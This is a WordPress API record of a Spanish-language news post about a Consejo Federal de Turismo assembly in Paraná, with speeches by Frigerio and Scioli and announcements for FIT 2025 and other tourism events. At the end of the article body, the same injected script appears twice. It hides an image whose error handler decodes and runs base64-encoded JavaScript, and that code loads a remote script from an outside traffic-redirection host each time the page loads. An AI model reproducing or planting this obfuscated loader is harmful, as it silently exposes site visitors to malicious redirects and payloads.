{"id":5176,"date":"2025-05-23T10:30:05","date_gmt":"2025-05-23T13:30:05","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5176"},"modified":"2025-08-13T23:32:49","modified_gmt":"2025-08-14T02:32:49","slug":"frigerio-y-scioli-encabezaron-un-nuevo-encuentro-del-cft-en-entre-rios","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5176","title":{"rendered":"Frigerio y Scioli encabezaron un nuevo encuentro del CFT en Entre R\u00edos"},"content":{"rendered":"\n<p><strong><em>Luego de la apertura del 50\u00b0 Congreso de Agentes de Viajes se realiz\u00f3 la 171 Asamblea del Consejo de Turismo en Paran\u00e1, con la presencia del gobernador de Entre R\u00edos, Rogelio Frigerio y el secretario de Turismo, Ambiente y Deportes, Daniel Scioli.<\/em><\/strong><\/p>\n\n\n\n<p><strong>Daniel Scioli<\/strong>&nbsp;destac\u00f3 \u00ab<em>la unidad de todo el sector tur\u00edstico, tanto el p\u00fablico como el privado<\/em>\u00bb y \u00ab<em>la posibilidad de abordar de manera conjunta todos los temas que le interesan al rubro como las inversiones, los eventos y la capacitaci\u00f3n<\/em>\u00ab.<\/p>\n\n\n\n<p>\u00ab<em>Le acerqu\u00e9 al Jefe de Gabinete Guillermo Francos el pedido del Presidente del Consejo Federal de Turismo, que en el mes de octubre podamos tener un fin de semana largo para impulsar la actividad en todas las regiones del pa\u00eds<\/em>\u00ab, complet\u00f3.<\/p>\n\n\n\n<p>En ese marco,&nbsp;<strong>Frigerio<\/strong>&nbsp;celebr\u00f3 que la reuni\u00f3n se realizara en la provincia que gobierna, a la par que subray\u00f3: \u201c<em>El turismo es fundamental<\/em>\u201d porque \u201c<em>genera trabajo<\/em>\u201d, el que \u201c<em>se crea en sectores muy importantes<\/em>\u201d. \u201c<em>Hoy gobernar es generar empleo<\/em>\u201d, fundament\u00f3. Tambi\u00e9n destac\u00f3: \u201c<em>Estamos ac\u00e1 trabajando todos juntos. Tanto el turismo como el deporte saltan todas las grietas y hacen que trabajemos juntos<\/em>\u201d.<\/p>\n\n\n\n<p>Tambi\u00e9n estuvieron presentes; el subsecretario de Deportes,&nbsp;<strong>Di\u00f3genes de Urquiza Anchorena<\/strong>;&nbsp;<strong>Gustavo Hani<\/strong>, presidente de la C\u00e1mara Argentina de Turismo;&nbsp;<strong>Valent\u00edn D\u00edaz Gilligan<\/strong>, presidente del Consejo Federal de Turismo;&nbsp;<strong>Jorge Satto<\/strong>, secretario de Turismo provincial; y&nbsp;<strong>Germ\u00e1n Bakker<\/strong>, director Nacional del CFT.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/171_cft_2.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Mientras que&nbsp;<strong>Diaz Gilligan<\/strong>&nbsp;felicit\u00f3 la presencia del sector privado, sumado al p\u00fablico, y dijo: \u201c<em>Es algo que mejora el d\u00eda a d\u00eda de la actividad y que nos motiva a que crezcamos<\/em>\u201d. Luego explic\u00f3 que \u201c<em>el turista viaja por experiencias. Cada vez m\u00e1s experiencias tienen que ver con eventos de tipo deportivos, musicales, con las fiestas, con las atracciones y eso permite m\u00e1s empleos<\/em>\u201d.<\/p>\n\n\n\n<p>En tanto, el subsecretario de Deportes,&nbsp;<strong>Di\u00f3genes de Urquiza Anchorena<\/strong>, destac\u00f3 la importancia del deporte tanto para el turismo como para la para desarrollo de los ni\u00f1os y adolescentes del pa\u00eds. En este sentido Urquiza invit\u00f3 para la participaci\u00f3n de las provincias en Juegos Deportivos Nacionales Evita, cuyas finales se realizar\u00e1n en Mar del Plata del 29 de septiembre al 4 de octubre.<\/p>\n\n\n\n<p>Durante la reuni\u00f3n del CFT se present\u00f3 el&nbsp;<strong>nuevo Sistema de Calidad Tur\u00edstica<\/strong>, a cargo de la directora Nacional de Calidad Tur\u00edstica,&nbsp;<strong>Mar\u00eda Rita Kuiy\u00e1n<\/strong>; tambi\u00e9n el director Nacional de Desarrollo y Promoci\u00f3n,&nbsp;<strong>Pablo Cagnoni<\/strong>, present\u00f3 la&nbsp;<strong>Gu\u00eda de Inversiones<\/strong>&nbsp;que fue financiada por la CAF, que muestra las ventajas competitivas del pa\u00eds, oportunidades de negocio y el nuevo marco regulatorio vigente.<\/p>\n\n\n\n<p>El director del Consejo Federal de Turismo,&nbsp;<strong>German Bakker<\/strong>, se\u00f1al\u00f3 que \u201c<em>el \u00e1rea est\u00e1 trabajando en la articulaci\u00f3n interinstitucional y el fortalecimiento t\u00e9cnico de provincias y regiones<\/em>\u201d.<\/p>\n\n\n\n<p>Asimismo, se defini\u00f3 que el&nbsp;<strong>Foro Nacional de Turismo<\/strong>&nbsp;se realizar\u00e1 en la provincia de San Juan los d\u00edas 4 y 5 de septiembre, y abordar\u00e1 tem\u00e1ticas relacionadas a los destinos tur\u00edsticos inteligentes.<\/p>\n\n\n\n<p>Durante el encuentro se realiz\u00f3 el lanzamiento de&nbsp;<strong>Hotelga 2025<\/strong>, el Programa Turismo interno con precios congelados,&nbsp;<strong>FIT 2025<\/strong>, y la Diplomatura Universitaria de Extensi\u00f3n en Gesti\u00f3n de Agencias de Viajes.<\/p>\n\n\n\n<p>Por su parte, el secretario de Turismo de CAME,&nbsp;<strong>Gregorio Werchow<\/strong>, realiz\u00f3 un an\u00e1lisis del impacto tur\u00edstico de los fines de semana largos.<\/p>\n\n\n\n<p>Adem\u00e1s, el&nbsp;<strong>Instituto Nacional de Promoci\u00f3n Tur\u00edstica<\/strong>&nbsp;present\u00f3 una nueva capacitaci\u00f3n para fortalecer la promoci\u00f3n de las provincias: Encuentros de marketing digital para el turismo.<\/p>\n\n\n\n<p>Por \u00faltimo,&nbsp;<strong>Scioli<\/strong>&nbsp;y&nbsp;<strong>Dey\u00e1<\/strong>&nbsp;presentaron a&nbsp;<strong>Portugal<\/strong>&nbsp;como el pa\u00eds invitado de&nbsp;<strong>FIT 2025<\/strong>, con la presencia de Miguel Morales, Head of trade Relations- Turismo de Portugal y Bernardo Barreiros Cardoso, director de turismo de Portugal para Latinoam\u00e9rica. La Feria se desarrollar\u00e1 del 27 al 30 de septiembre&nbsp;en&nbsp;La&nbsp;Rural.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:323px;height:auto\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Luego de la apertura del 50\u00b0 Congreso de Agentes de Viajes se realiz\u00f3 la 171 Asamblea del Consejo de Turismo en Paran\u00e1, con la presencia del gobernador de Entre R\u00edos, Rogelio Frigerio y el secretario de Turismo, Ambiente y Deportes, Daniel Scioli. Daniel Scioli&nbsp;destac\u00f3 \u00abla unidad de todo el sector tur\u00edstico, tanto el p\u00fablico como [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5177,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,16],"tags":[],"class_list":{"0":"post-5176","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5176"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5176"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5176\/revisions"}],"predecessor-version":[{"id":6486,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5176\/revisions\/6486"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5177"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5176"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5176"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5176"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}